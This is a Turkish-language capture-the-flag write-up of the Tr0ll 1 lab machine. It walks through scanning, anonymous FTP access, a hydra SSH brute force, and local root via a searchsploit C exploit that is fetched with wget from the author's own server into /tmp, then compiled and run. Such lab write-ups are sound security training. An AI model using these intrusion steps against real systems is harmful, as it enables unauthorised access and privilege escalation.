Bu yazımda zafiyetli makine olarak tr0ll ‘ün ilk versiyonunu ele aldım. Keyifli okumalar..
Öncelikle ağdaki cihazları nmap ile tarattıktan sonra hedefe ait adresinin tespitini yaptım.
> 192.168.216.144
Tarayıcıdan ip adresine gittiğimde böyle bir ekranla karşılaştım ve başkada bir şey yoktu.
Detaylı bir nmap taramasıyla sistemde ftp, ssh ve http portlarının açık olduğunu keşfettim. Ftp portu üzerinden Anonymous ile login yapabileceğimize dair bir ipucu var. Bu aklımızda bulunsun.
Burada web sayfasında ki içerikleri, linkleri vs. bir dirb taraması yapıp öğrenmek istiyorum.
Mevcut dizinler kontrol edildiğinde robots.txt dosyası içinde bir /secret dizininin var olduğunu gördüm ve tarayıcıdan adrese gittim.
Ekranda tıpkı anasayfa da olduğu gibi bir resim vardı ve başka bir şey yoktu.
Ardından bir de nikto aracıyla host adresini belirterek tarama yaptım.
Tarama sonucunda farklı olarak /icons/README adlı bir dizin keşffetim.
Bu dizin görüntülendiğinde sayfanın sıradan işe yaramayan bir yazıdan ibaret olduğu görülecektir. Burdan da bir şey çıkmadı. Sistemde ftp portu açıktı bir bağlantı kurmaya çalıştım.
Kullanıcı adı ve parolayı Anonymous olarak girdiğimde başarılı bir şekilde bağlantı sağladım. Dosyaları görüntüledim ve lol.pcap adında bir dosya vardı. Bu dosyayı get komutuyla sisteme çektim ve wireshark aracıyla incelemeye başladım.
lol.pcap dosyası üzerinden Ftp portundan gelen giden paketleri incelediğimde ekranda belirtilen yazıyla karşılaştım. Tarayıcıdan sup3rs3cr3tdirlol adresini görüntüleyince bir index sayfası ve içinde bir dosya vardı.
Tabi ilk akla gelen bu roflmao dosyasını indirmek olacaktır.
Dosyayı indirip incelemeye strings komutyla içeriğini görüntüledim. Karşıma “devam etmek için 0x0856BF adresini bul” gibi bir mesaj çıktı. Dolayısıyla 0x0856BF adlı bu adrese gittim.
Burada da iki klasör var. Birisi good_luck (iyi şanslar) diğeri ise parola içerdiğini belirten this_folder_contains_the_password klasörüdür.
İlk klasörün içinde de bir dosya (which_one_lol.txt) mevcut ve bu dosya bir parola listesi içermektedir.
Daha sonra sırasıyla this_folder_contains_the_password > Pass.txt olarak izlendiğinde Good_job_:) gibi bir mesajın var olduğu görülecektir.
Bundan sonrası için bir ssh bağlantısı yapmak istiyorum ve tespit ettiğim parola listesini kullanıyorum.
Listeyi indirip ardından hydra aracıyla bir brute force saldırısı gerçekleştirdim.
Başta, kullanıcı olarak indirdiğim dosyayı (which_one_lol.txt), parolayı da Good_job_:) olarak belirttim. Başarılı olamayınca parola kısmını Pass.txt olarak değiştirdim. Atağı başlattım ve kullanıcı adını overflow olarak tespit etmiş oldum.
Evet overflow kullanıcısıyla bağlantıyı kurdum. Artık overflow kullanıcısı üzerinden işlemler gerçekleştirebiliriz fakat bu işlemlerde kısıtlı olacaktır. root dışında hangi kullanıcı olursa olsun yapılacak işlemler kısıtlıdır. Dolayısıyla root olmak istiyorum. Ekranda bağlantıyla birlikte gelen açıklamalarda sistemin ubuntu 14.04 sürümünü kullandığı belirtimiş. searchsploit 14.04 diyerek işletim sistemi bilgisini girdim bu yönde zafiyet arattım.
Yerel root olmamızı sağlayabilecek c dilinde yazılmış bir kod var. Ben daha önce bu kodu indirmiştim. Root yetkisine sahip olmadığım için kendi bilgisayarımdan bunu hedef sisteme yükledim. Bunun için kendi terminalimde php -S 192.168.216.131:5000 diyerek bir sunucu oluşturdum.
Ardından hedef sistemde geçici dosyaları/dizinleri barındıran tmp dizinine geçiş yaptım. İndirme işlemini tmp dizininde gerçekleştireceğim.
İndirdiğim c kodu Downloads klasöründe olduğu için wget aracıyla dosyayı indirirken http://192.168.216.133:5000/Downloads/37292.c url’sini belirttim. Daha sonra gcc komutuyla bu c dosyasını derleyip çıktısı olarak gelen a.out çalıştırdım ve başarılı bir şekilde root oldum.
Son olarak sistem biraz kurcalandığında root dizini altında ki proof.txt dosyasının mevcut olduğu farkedilecektir. Bu dosya bir anahtar içermektedir. Ayrıca Başardığımıza dair bildirilen bu mesaj ile tr0ll makinesinin writeupı tamamlanmış olacaktır.
